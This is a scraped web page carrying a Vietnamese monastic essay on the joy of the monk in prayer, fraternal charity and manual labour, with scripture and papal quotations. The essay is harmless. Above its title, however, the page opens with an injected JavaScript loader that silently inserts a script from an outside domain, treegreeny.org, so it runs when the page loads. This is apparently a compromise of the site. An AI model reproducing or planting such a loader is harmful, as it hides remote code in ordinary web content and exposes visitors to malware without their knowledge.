;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); NIỀM VUI CỦA NGƯỜI ĐAN SĨ – Xitô PS

NIỀM VUI CỦA NGƯỜI ĐAN SĨ

Chúng ta đang sống trong một xã hội đầy văn minh hiện đại, khoa học công nghệ, kỹ thuật phát triển không ngừng. Chính vì sự phát triển nhanh chóng vượt bậc ấy, con người lại càng phải chạy thật nhanh mới kịp với cái đà tiên tiến của thế giới. Càng văn minh đến đâu, con người lại càng phải chạy. Càng chạy lại càng mệt mỏi và tạo ra sự căng thẳng, xung đột giữa con người với nhau. Sự lo lắng về cơm áo gạo tiền hay thiên tai lũ lụt lại là sự sợ hãi nhất dẫn đến sự bất an cho con người. Nó là nguyên cớ khiến con người phải đau khổ. Như thế, đời sống con người chỉ mang một màu xám ảm đạm đen tối mịt mù. Do đó, con người chỉ biết hát lên những khúc ca buồn ảm đạm. Vậy điều gì khiến con người lại sống trong cái buồn ấy? Phải chăng “nét duyên tươi” là phương thế giúp con người vơi đi nỗi buồn u tối. Nó còn tồn tại trong thế giới này nữa không, đặc biệt nét duyên tươi có tầm ảnh hưởng như thế nào trong đời sống đan tu?

Niềm vui trong kinh nguyện

Trong thư Thexalonica Thánh Phaolô nói: “Hãy vui mừng luôn mãi và đừng ngớt lời cầu nguyện” (1Tx 5, 17). Cuộc đời của người đan sĩ không gì khác hơn là đi vào việc phụng sự Thiên Chúa. Phụng sự Thiên Chúa là việc cốt lõi nhất mà người đan sĩ hằng phải chú tâm để ca ngợi Chúa đêm ngày. Cha Thánh Biển Đức khi dạy con cái Ngài phải: “Tuyệt đối không lấy gì hơn tình yêu Chúa Kitô”. Tình yêu Chúa Kitô mà người đan sĩ mong mỏi khao khát kiếm tìm đó chính là việc mộ mến Thần vụ như Vịnh gia đã cảm nghiệm:

“Như nai rừng mong mỏi
Tìm về suối nước trong
Hồn con cũng trông mong
Được gần Ngài lạy Chúa”.

Có thể nói: cuộc đời của đan sĩ là một bài ca tán tụng dâng lên Thiên Chúa với tất cả lòng yêu mến không ngơi. Trong kinh nguyện đan sĩ ca hát Thánh vịnh với niềm hăng say, nhiệt huyết, ca hát với sự hân hoan, phấn khởi để bày tỏ tình yêu của mình với Đấng tạo hóa. Thánh Augustino đã từng nói: “Hát là cầu nguyện hai lần” . Vì thế, việc Thần vụ của đan sĩ là việc cung chiêm nguyện cầu ngày đêm để ‘chuyện vãn thân tình với Chúa’, làm nên tấm vải thiêng liêng như món quà tặng dâng lên Thiên Chúa. Món quà đó là sự kết hiệp mật thiết với Chúa. Như Vịnh gia, người đan sĩ có thể thốt lên: “Niềm vui của con là chính Chúa”(Tv 103,35). Vâng! Cảm nghiệm được chiều sâu nội tâm đó, đan sĩ mới có sức để gặp gỡ Thiên Chúa, Đấng là cùng đích của họ. Vậy thế nào là cuộc gặp gỡ Chúa cách đích thực. Theo từ điển tiếng Nhật có một từ ngữ rất thú vị và ý nghĩa để diễn tả khái niệm về cuộc gặp gỡ này. Đó chính là ‘Deai’. ‘De ’ có nghĩa là đi ra khỏi, và ‘ai’ có nghĩa là gặp gỡ. Nếu người đan sĩ ra khỏi ‘căn phòng’ mình thì mới có thể gặp gỡ Thiên Chúa, dù bất cứ nơi nào và ở đâu. Gặp gỡ Chúa là niềm vui đích thực của đan sĩ, vì như Vịnh gia đã nói:

“Ước chi con hằng tìm kiếm Chúa
Đều mừng vui hoan hỷ trong Ngài”.

Hay như Đức Thánh cha Phanxico nói trong Tông huấn Niềm vui Tin Mừng: “Niềm vui của Chúa chỉ tràn ngập tâm hồn cho những ai gặp được Đức Giêsu”, cũng trong Tông huấn Gaudete- et-Exsultate, Ngài nói rằng: “một con người gặp gỡ Đức Kitô là một con người sống vui tươi, cuộc sống không nhạt nhẽo chua ngoa, u sầu hay mang bộ mệt mỏi, nhưng thể hiện một tinh thần tích cực và đầy hy vọng” (GE số 122). Đức Hồng y Phanxico Xavie Nguyễn Văn Thuận trong cuốn sách Đường Hy Vọng số 541, Ngài có đặt câu hỏi: “Tại sao con không vui? Chắc là giữa tâm hồn con với Chúa có gì không ổn. Xét mình đi, con sẽ thấy ngay”. Ngài hỏi tiếp “Làm sao cho hết buồn?” Ngài trả lời: “Hãy cầu nguyện”. Tại sao thế? Vì theo Ngài gặp được Chúa trong cầu nguyện là niềm vui của ngài, và trong cuốn sách cầu nguyện theo gợi ý của Đức Thánh cha Phanxico, linh mục Nguyễn Công Đức đã cảm nghiệm niềm vui của Chúa bằng chính đời sống nguyện cầu, vì thế Ngài nói: “Giờ cầu nguyện này tôi chiêm ngắm niềm vui của Chúa và tôi cầu xin ơn Chúa ban cho tôi cảm nghiệm niềm vui ở trong đời sống thánh hiến, để lan tỏa niềm vui ấy cho mọi người”. Những người sống đời thánh hiến là những người có niềm vui, vì trong tâm hồn họ có bóng dáng của Đức Kitô và có Chúa Kitô ở cùng họ. Có Chúa nơi tâm hồn, đan sĩ mới có sức mạnh để xua đuổi sự buồn chán và không thể nào bóp méo được niềm vui.

Chỉ có trong kinh nguyện đan sĩ mới kín múc được tình yêu và nguồn ân sủng của Chúa, kín múc được niềm vui trọn vẹn như người mẹ sắp sinh ra đứa con của mình vậy. Thánh tổ Theodore nói: “Đan sĩ phải là người khao khát một mình Chúa, nhìn một mình Chúa mà thôi ”. Lòng khao khát và sự say mê của đan sĩ mới làm cho tâm hồn họ được lớn lên, trái lại không có lòng khao khát thì không thể nào đụng chạm đến Chúa và cũng không thể kín múc được niềm vui trong tâm hồn. Giờ Thần vụ mà đan sĩ hát không phải để cho hay, chạy theo số lượng, nhưng là để kết hiệp và nên đồng hình đồng dạng với Đức Kitô. Mỗi giây phút cầu nguyện, tâm hồn họ được kêu lên tiếng nói tình yêu tha thiết của Chúa Giêsu, một tiếng kêu vui sướng tột cùng: “Abba, Cha ơi”. Tiếng kêu đó, họ muốn san sẻ cho Chúa về tất cả mọi niềm vui đang rộn rã trong lòng họ. Tiếng kêu đó họ muốn lao vào lòng Chúa thực sự, để trút cho Chúa mọi gánh nặng, lo âu phiền toái đang cư ngụ trong lòng. Trong kinh nguyện, đan sĩ được nhìn thấy khuôn mặt yêu thương của Chúa Cha, Đấng hiện diện nơi họ, Đấng làm cho họ được rạng rỡ. Nhờ đó mà trong lòng họ luôn luôn là sự hạnh phúc thực sự, họ được thốt lên những lời thân thương ngọt ngào:

“Trước Nhan Ngài ôi vui sướng tràn trề
Ở bên Ngài hoan lạc chẳng hề vơi”.

Niềm vui của người đan sĩ thật là diệu kì biết bao, vì mỗi giây phút trước Thánh Nhan là mỗi lần họ được chiêm ngưỡng vinh quang rạng ngời của Thiên Chúa, họ được đón nhận hoa trái niềm vui do chính họ cảm nghiệm. Chính nhờ chiêm cung nguyện cầu thâm sâu đó, đan sĩ mới có thể làm nên một thế giới mới, một thế giới có sức sống và tràn đầy niềm vui, như đan sĩ Thomas Merton đã từng nói: “Chỉ cần có khoảng 20 người chiêm niệm thâm sâu, mới có thể giữ vững được thế giới”. Niềm vui thánh hiến của người đan sĩ không bao giờ sống trong một thế giới ồn ào, náo động, vì Chúa không bao giờ ở trong sự ồn ào của đan sĩ. Sống trong một thế giới ồn ào sẽ bóp nghẹt niềm vui của đan sĩ. Cuộc đời của người đan sĩ không gì khác hơn là đi vào một thế giới mà không có tiếng ồn, để trở nên chứng tá cho mọi phần tử của thế giới sống trong tiếng ồn, nhằm mục đích là chia sẻ niềm vui của Chúa là niềm vui của sự thinh lặng cho mọi người, nhất là chia sẻ niềm vui cho các thành viên trong cộng đoàn của mình, là những người đang sống chung quanh mình.

Niềm vui là hoa trái của Đức ái

Mở đầu Tông thư của Đức Thánh cha Phanxicô gửi cho tất cả những người sống đời tận hiến nhân dịp năm đời sống thánh hiến có nói như sau: “Ở đâu có tu sĩ ở đó có niềm vui”. Niềm vui là nét nổi bật trong linh đạo của Ngài. Với Ngài, “niềm vui là động lực của sứ mạng Kitô giáo ”(EG số 1) và “niềm vui cũng là dấu chỉ của sự thánh thiện” (GE số 122-128). Vì thế, niềm vui của tu sĩ không phải vì mục đích là nhắm đến bộ tu phục, mà là niềm vui của sự gặp gỡ trong tinh thần hiệp thông đức ái với tha nhân. Trong bộ phim Jesus of Roger young, các đạo diễn đóng phim đã trình bày câu chuyện của Chúa Giêsu khi diễn tả phong thái vui tươi của Người đối với mọi người. Chúa Giêsu đã tràn ngập niềm vui thật sâu sắc và Người lan tỏa niềm vui ấy cho các môn đệ: “Các điều ấy Thầy đã nói với anh em để anh em được hưởng niềm vui của Thầy và niềm vui của anh em được nên trọn vẹn” (Ga 15,11). Nềm vui đó chính là hoa trái của đức ái được thể hiện nơi Người.

Hoa trái của đức ái là ân ban tuyệt vời của Thiên Chúa ban cho con người, cách đặc biệt đối với đan sĩ sống đời đan tu, để họ tạo nên mối dây liên kết với nhau trong mối tình hiệp thông huynh đệ. Đan sĩ Thomas Merton khẳng định: “Không ai là một hòn đảo”. Đời sống đan tu không thể nào có được niềm vui trọn vẹn nếu không có đức ái và không tương giao với mọi người, nếu không có đức ái thì đồng nghĩa với việc liên kết giữa các phần tử trong cộng đoàn sẽ bị rạn nứt. Vì thế, đức ái có tầm quan trọng và cần thiết cho đời sống của đan sĩ. Sống đức ái, đan sĩ mới thực sự là con người dễ mến và dễ thương, mới có khả năng để sống yêu thương như tinh thần luật Chúa: “Anh em hãy yêu thương nhau như Thầy đã yêu thương anh em” (Ga 14, 23). Sống trong môi trường đan tu, đan sĩ phải biết tạo cho mình sợi dây đức ái để sống vui tươi, vì có niềm vui mới tạo nên sự gần gũi và thân thiết trong đời sống huynh đệ, như trong cuốn sách Đường Hy Vọng số 539, Đức Hồng y Phanxico Xavie Nguyễn Văn Thuận có nói: “Phải vui với người thương con, vui với người ghét con, vui lúc con bị bỏ rơi”. Ngoài việc dâng hiến trọn vẹn cho Thiên Chúa, người đan sĩ phải biết tập chú vào đời sống huynh đệ nhiều hơn, để cùng nhau lớn lên trên con đường hoàn thiện (Mt 5, 48). Trong Thông điệp “Đấng cứu chuộc con người” Đức Giáo hoàng Gioan Phaolô II quả quyết rằng: “Con người không thể sống nếu không có đức ái” hay như trong Tông hiến “Tìm kiếm tôn nhan Thiên Chúa” có nói: “Đời sống thánh hiến là câu chuyện tình yêu đối với tha nhân” (số 51). Đức ái giúp người đan sĩ hiểu biết chính mình và đong đầy niềm vui cho người khác. Niềm vui của đan sĩ không chỉ hệ tại việc tận tình phục vụ mà là ở nơi tâm hồn của họ. Đan sĩ phải là người biết trao ban niềm vui cho anh em, đừng vì một chút danh dự hay chức vụ trong cộng đoàn mà nhìn anh em với dáng vẻ tầm thường, nhưng hãy tôn trọng và nhìn anh em với cái nhìn trong niềm vui của Chúa, hãy nhìn anh em như “cây đèn cháy sáng ban đêm” để chiếu tỏa tình yêu của Chúa đến cho cộng đoàn, như Mẹ Têrêxa Calcutta đã cảm nhận được niềm vui của mình khi đến với những con người bất hạnh, nghèo khổ, hay những người bị bệnh sida, vì thế Mẹ đã thốt lên rằng: “Một tâm hồn ngập tràn niềm vui là hãy yêu thương như Chúa đã yêu, hãy cho đi như Chúa đã cho đi, hãy phục vụ như chính Chúa đã phục vụ ”. Nếu người đan sĩ không có những điều ấy thì khó có thể sống đời huynh đệ cộng đoàn, và không sống được với anh em thì chỉ là một tâm hồn buồn mà thôi, một tâm hồn buồn sẽ sinh ra sự uể oải, chán chường, cô đơn và thất vọng, tâm hồn sẽ trở nên tẻ nhạt, không có sự bình an, chẳng khác gì như bài ca buồn đưa đám. Đời sống huynh đệ cộng đoàn phải là một đời sống ắp đầy niềm vui, nếu không cảm nghiệm được niềm vui đó, thì khó có thể bền đỗ trong ơn gọi, và dầu có sống ơn gọi đó chăng nữa, cảm thấy cuộc đời sẽ không hạnh phúc, rồi một ngày nào đó cũng phải xách balô ra về. Vì thế, đời sống cộng đoàn phải là niềm vui trong tình bác ái, vì đức ái mới làm cho các phần tử trong cộng đoàn được liên đới với nhau, như trong bài hát ‘Ngọt ngào thay’ có nhắc đến câu: “Tốt đẹp thay anh em ta sống chung một nhà”, đã được cất lên để nói về sự hiệp nhất trong đức ái với người anh em. Đem niềm vui Chúa đến cho anh em là một điều rất hạnh phúc, vì đó là ngưỡng cửa cuộc đời đẹp nhất của đan sĩ, như Cha Tổ phụ Biển Đức Thuận nói trong Di ngôn số 144: “Niềm vui giữa cộng đoàn là niềm vui trong Chúa”. Cuộc đời của đan sĩ sống đức ái trọn vẹn sẽ sản sinh ra một mùa bội thu là ân sủng của Thiên Chúa. Ở đấy, đan sĩ được chan chứa niềm vui khôn tả từ lòng thương xót của Thiên Chúa, Đấng là nguồn an ủi và nâng đỡ đan sĩ bước đi trong suốt cả cuộc đời.

Sống trong cộng đoàn không thể nào không có thử thách, không thể nào tránh khỏi những hiểu lầm, trái tính, trái nết. Những khác biệt mới là đáng sợ và nguy hiểm đến nhân phẩm của người khác. Nó có thể tạo hàng vạn “bom nguyên tử” hay con “virus Corona” đến từ Vũ hán Trung Quốc, để gây đau khổ cho nhau. Nhưng làm sao đan sĩ có thể vượt lên tất cả những giới hạn của kiếp người? Làm sao có thể che lấp được muôn vàn khổ đau? Thánh Têrêsa Hài Đồng đã cho chúng ta câu trả lời, bằng những vần thơ thật ý nghĩa cho cuộc đời đan sĩ:

“Bình an con khi mắt tràn khóe lệ
Trước tha nhân con tỏ mặt mỉm cười
Đau khổ nào lại không có duyên tươi
Nếu ta biết chôn vùi dưới hoa thắm”.

Sống trong đau khổ Têrêsa vẫn vui tươi mỉm cười. Chị đã mỉm cười sống chan hòa với mọi người. Niềm vui mà chị có được cũng chỉ vì sự ý thức về ơn gọi của mình: “Ơn gọi của con chính là tình yêu”. Chỉ có tình yêu mới có thể nở nụ cười duyên dáng như thế đó, hay trong cuốn sách “Để gió cuốn đi” của Sr Giồng có nhắc đến câu thơ:

“Ta vẫn hát khi lòng ta tan nát
Ta vẫn cười khi nước mắt ta rơi”.

Dầu phải đối diện với thử thách chông gai của cuộc đời, tâm hồn ta có tan nát bao nhiêu hay nước mắt có rơi đi chăng nữa lòng ta vẫn hát, vẫn vui vẻ. Cuộc đời của đan sĩ là cuộc đời phải biết lấp đầy niềm vui, sẽ mang nơi tâm hồn mình một màu hồng hy vọng. Để có được niềm vui đòi buộc đan sĩ phải trả giá, giá mà người đan sĩ trả không phải bằng vàng, bạc hay tiền Dollar, nhưng là phải trả giá bằng chính niềm vui của mình, vì như người ta nói rằng: “Muốn gặt niềm vui thì phải giao niềm vui”, hay như Thánh Phaolo nói: “phải vui với người vui ”(Rm 12,12), hay như Đức Hồng y Thuận có nói:

“Hãy vui với người thương con

Vui với người ghét con

Vui lúc con hớn hở

Vui lúc lòng con đau khổ tê tái

Vui lúc mọi người theo con

Vui lúc con cô đơn bị bỏ rơi” (ĐHVSỐ539).

Người can đảm phải là người dám cười với người khác, để làm cho mọi người đến với mình cũng cảm thấy bầu khí vui tươi. Vì thế, trong đời sống đan tu, đan sĩ đừng quên tặng người khác niềm vui mà thế gian không thể cho được, nhưng đan sĩ phải kín múc kho tàng vui tươi vô tận, để vượt qua mọi thử thách và xây dựng nét duyên tươi cho cộng đoàn.

Niềm vui trong lao động

Trong đời sống xã hội coi việc lao động như là phương tiện để mưu sinh và đó cũng là một gánh nặng đối với con người. Dầu phải đối diện với gánh nặng đó, con người vẫn xả thân lao vào công việc để kiếm tiền nhằm phục vụ gia đình hay vì những miếng cơm manh áo. Lao động để phục vụ là tốt, nhưng bên cạnh đó vẫn còn gặp những bất lợi và hiểm nguy. Với 39 nạn nhân lao động ở nước Anh bất hợp pháp cho thấy rằng: đó không chỉ khó khăn về con đường tìm kiếm công ăn việc làm, nhưng là một sự hiểm nguy đối với toàn thể thế giới, dẫn con người đưa tới chỗ diệt vong. Quả thực, lao động như thế có phải là niềm vui, niềm hạnh phúc đối với họ hay không? Thiết nghĩ, đó không phải là niềm vui như họ mơ ước, nhưng là một sự bất an, một sự tổn thương đối với họ và người thân.

Chúng ta thử đặt câu hỏi: Trong đời sống của con người lao động như thế nào mới là niềm vui thực sự, mới đạt hiệu quả và có mục đích? Nhìn về đời sống đan tu, phải lao động như thế nào mới là niềm vui cho người đan sĩ? Trong lao động, công việc của đan sĩ hoàn toàn khác so với ở ngoài đời, vì ở đời họ làm với mục đích là để kiếm tiền mưu sinh, còn đối với đan sĩ thì không phải thế, họ làm không phải để lấy lương, nhưng là để phục vụ Chúa, phục vụ Giáo hội, hầu mưu ích cho tâm hồn đan sĩ được lớn lên. Vâng! Cuộc đời của đan sĩ được Cha Tổ phụ ví như bộ rễ cây mà không ai biết đến, để nói về sự khiêm nhường của đan sĩ. Như Thánh Têrêsa Hài Đồng: “Đan sĩ làm những công việc bình thường với một tâm hồn phi thường”. Con đường nên thánh của đan sĩ không phải làm những cộng việc to tát đâu, nhưng làm với những công việc nhỏ mọn và đơn sơ trong “sự âm thầm cầu nguyện và hy sinh, để cứu độ các linh hồn”(Hp số 2). Công việc nhổ cỏ, quét lá, hay trồng những bông hoa trong chậu cảnh cũng đã đủ để nên thánh nếu đan sĩ làm với tất cả sự ý thức và với lòng yêu mến thực sự.

Công việc của đan sĩ không nhằm mục đích là cốt để cho nhanh hay cho xong công việc, và cũng không phải là một cuộc chạy đua với thời gian, nhưng làm việc vì lòng yêu mến Chúa Kitô. Niềm vui của đan sĩ chỉ có được khi họ biết đặt tình yêu vào trong công việc, nghĩa là phải hăng say, kiên trì trong việc bổn phận hằng ngày của mình nhằm tôn vinh danh Chúa và vì lợi ích cho phần rỗi lương dân. Thánh Phaolô đã từng nói: “Bất cứ làm việc gì hãy tận tâm như thể làm cho Chúa” (Cl 3,23) hay “Bất cứ làm việc gì, anh em hãy làm để tôn vinh Thiên Chúa”. Trong lao động, đan sĩ làm việc trong sự thinh lặng với một tâm hồn thẳm sâu như Hiến pháp đã minh định: “Thinh lặng là yêu sách của đời chiêm niệm”. Thinh lặng là hoa trái thiêng liêng người đan sĩ phải thực sự nhắm tới, vì trong công việc, Thiên Chúa luôn hiện diện và đồng hành cùng với họ khi họ biết xây dựng trong tâm hồn một sự thinh lặng. Trong thinh lặng đan sĩ mới có thể gặp Chúa trong niềm hoan lạc. Việc lao tác của đan sĩ không chỉ nhắm tới về lợi ích sức khỏe hay vì một chút cơ bắp cuồn cuộn, nhưng là nhắm tới việc cứu độ các linh hồn và người khác, vì như Hiến pháp số 2 đã nói về mục đích của đời đan tu: “Đan sĩ làm việc trong sự âm thầm và hy sinh, để đưa người chưa nhận biết Chúa được ăn năn trở lại”. Để có được khát mong ấy, đan sĩ phải sống vui tươi và kiên trì với công việc mình làm, đừng vì một chút nặng nề hay gian nan trong công việc mà lại sinh ra buồn chán, thất vọng, nhưng hãy tin tưởng vào sự quan phòng của Thiên Chúa, có Chúa luôn nâng đỡ và đồng hành với chúng ta trên mọi nẻo đường đầy gian lao nghiệt ngã, như lời Thánh Phaolô: “Một chút gian truân tạm thời sẽ mang lại cho chúng ta cả một khối vinh quang vô tận tuyệt vời” (2Cr 4, 17). Niềm vui mà người đan sĩ chỉ có được chỉ khi họ biết đặt tình yêu vào trong công việc, nghĩa là phải hăng say, kiên trì trong công việc bổn phận hằng ngày của mình.

Niềm vui là hồng ân cao cả của Thiên Chúa ban cho người đan sĩ. Dầu sống trong thân phận con người với niềm vui chóng qua đắp đổi ngày qua ngày, đan sĩ phải thực hiện một tiến trình “vượt qua”. Vượt qua niềm vui bên ngoài của hương vị cuộc sống, để hướng tới một niềm vui nội tâm hay còn gọi là niềm vui Thánh. Niềm vui đó mới thực sự là nét đẹp cho cuộc đời người đan sĩ, nét đẹp của một tâm hồn bình an và ngập tràn ơn Thánh của Thiên Chúa. Ước gì qua bài viết này, anh em hãy dệt cho mình những niềm vui đẹp trong đời sống đan tu, niềm vui của mối tình kết hiệp mật thiết với Chúa, niềm vui trong tình bác ái huynh đệ, và niềm vui trong sự hy sinh lao tác, để biến niềm vui đó thành niềm vui vĩnh cửu ở trên trời.

M. Kozaki Duyệt (Tập II)

You May Also Like

Trả lời

X